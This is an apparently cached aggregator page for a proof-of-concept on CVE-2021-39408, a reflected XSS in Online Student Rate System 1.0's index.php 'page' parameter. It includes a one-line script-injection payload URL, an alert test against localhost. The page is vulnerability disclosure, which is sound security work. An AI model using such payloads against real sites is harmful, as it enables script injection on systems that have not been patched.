CVE-2021-39408 PoC — Online Student Rate System 跨站脚本漏洞

Source

https://github.com/StefanDorresteijn/CVE-2021-39408

Associated Vulnerability

Title:Online Student Rate System 跨站脚本漏洞 (CVE-2021-39408)
Description:Online Student Rate System是一个学生在线评分系统。 Online Student Rate System v1.0版本存在安全漏洞，该漏洞源于 index.php 文件中的 page 参数未做验证。

Description

XSS vulnerability in Online Student Rate System1.0

Readme

# CVE-2021-39408
A reflected Cross Site Scripting (XSS) vulnerability exists in multiple version 1.0 of the Online Student Rate System application that allows for arbitrary execution of JavaScript commands.

## Vulnerable Page
On `index.php`, the `page` parameter is vulnerable, allowing an attacker to include any javascript within script tags:

```http://localhost/index.php?page=<script>alert('test');</script>```

Discovered by Stefan Dorresteijn, August 2021

File Snapshot


 [4.0K]  /data/pocs/827aff7bd069d6ea3e3306648eaf06cb94e91a47
└── [ 464]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!